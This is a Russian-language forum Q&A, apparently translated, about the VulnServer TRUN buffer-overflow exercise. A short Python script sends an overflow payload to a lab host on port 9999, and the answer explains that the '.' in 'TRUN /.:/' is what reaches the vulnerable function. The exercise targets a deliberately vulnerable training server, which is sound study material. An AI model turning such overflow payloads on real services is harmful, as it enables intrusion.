"/.:/" в команде "Эксплуатация VulnServer TRUN" - PullRequest
0 голосов
/ 02 августа 2020
• 1000 но на самом деле это не имеет значения]
shellcode = "TRUN /.:/" + "A"*2003 + "B"*4
    
    s = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('10.0.2.15', 9999))
    s.send(shellcode.encode())
    s.close()

Мне было интересно, почему синтаксис «TRUN /.:/" не просто « TRUN »

Я пытался погуглить, но все еще не могу найти, что означает "/.:/"

1 Ответ

0 голосов
/ 18 августа 2020

TRUN не будет сканировать sh без "." из-за условия if .

Уязвимая функция вызывается только при наличии '.' во входной строке.

...